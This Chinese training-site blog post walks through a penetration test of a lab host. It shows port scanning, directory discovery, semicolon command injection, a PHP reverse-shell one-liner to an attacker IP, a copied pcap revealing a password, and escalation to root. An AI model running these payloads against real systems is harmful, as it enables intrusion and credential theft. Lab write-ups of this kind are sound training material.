热门课程

免费试听

上课方式

开班时间

当前位置：首页 - 文章 - 新闻动态 - 正文

渗透测试是干什么?某主机的渗透测试过程记录

知了堂姐

2024-07-09 11:12:24

0次

在数字化时代，网络安全问题日益突出，各种网络攻击层出不穷。为了保护我们的信息安全，一种名为“渗透测试”的技术应运而生。那么，渗透测试是干什么呢？通过某主机的渗透测试过程记录为您揭开渗透测试的神秘面纱，带您领略其守护网络安全的强大力量。
一、信息收集
1、网站页面

渗透测试是干什么

没开80端口
用nmap扫一扫
2、服务器信息收集

Nmap只收集到这些东西。。。。。。。
太少了

做一个全端口扫描

渗透测试是干什么

发现了33447端口
访问一下

渗透测试是干什么

留了提示信息
估计是有黑页，扫一下目录

3、网站信息收集
用御剑扫到了phpinfo
http://192.168.7.36:33447/test.php

不过晃了一眼标题
长这样

渗透测试是干什么

不正常，感觉像是目录
试一试

渗透测试是干什么

果然是
不过也没sql注入和万能密码
怎么办呢
再扫一扫目录吧

渗透测试是干什么

渗透测试是干什么

发现几个有东西的网页
http://192.168.7.36:33447/Challenge/include.php

渗透测试是干什么

http://192.168.7.36:33447/Challenge/hacked.php

渗透测试是干什么

http://192.168.7.36:33447/Challenge/cake.php

渗透测试是干什么

初步看了看网页，没发现什么能用的地方
回头一看cake.php
发现标题是这个

这不套路跟刚才一样嘛

访问一下

发现这些东西

渗透测试是干什么

发现有泄露的源码和命令执行页面

渗透测试是干什么

渗透测试是干什么

二、漏洞确认
1、命令执行漏洞
用分号作为命令分隔符，用burp抓包发现是有回显的

渗透测试是干什么

三、漏洞复现

1. php拿shell
payload
php -r '$sock=fsockopen("172.16.11.33",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
转成url

渗透测试是干什么

渗透测试是干什么

开nc侦听，拿到shell

渗透测试是干什么

尝试提权

渗透测试是干什么

得，可以用cve-2017-16995提权
思路：用cve-2017-16995脚本提权

除此以外，可以看看里面有什么我们可以利用文件藏有密码

渗透测试是干什么

可以利用的用户 root、saman、acid
查找一下相关用户文件
find / -user acid 2>/dev/null

渗透测试是干什么

发现有个流量包

利用命令“scp -r /sbin/raw_vs_isi/hint.pcapng root@192.168.3.31:/home/”（其中192.168.186.134为攻击机IP）拷贝文件

在wireshark中打开文件，过滤非TCP协议内容，可获得saman用户密码：1337hax0r。

渗透测试是干什么

用su saman来切换账号

渗透测试是干什么

拿到root权限

上一篇：什么是渗透测试：某网站的渗透测试过程？

下一篇：内网扫描工具哪个好？内网扫描工具魔改版分享

大家都在看

欢迎报名！2023高校夏令营信安&开发集...

2024-07-09 浏览次数：0次

想当程序员，一定要通过培训机构吗？

2024-07-09 浏览次数：0次

成都java培训哪家比较好？有没有学费低点的？

2024-07-09 浏览次数：0次

4月编程语言排行榜：Python跌出前三，Jav...

2024-07-09 浏览次数：0次

女生学软件测试难不难？软件测试薪资待遇怎么样？

2024-07-09 浏览次数：0次

本科计算机专业毕业想做Java工程师，有必要报培...

2024-07-09 浏览次数：0次

最新资讯

渗透测试是干什么?某主机的渗透... 在数字化时代，网络安全问题日益突出，各种网络攻击层出不穷。为了保护我们的信息安全，一种名为“渗透测试...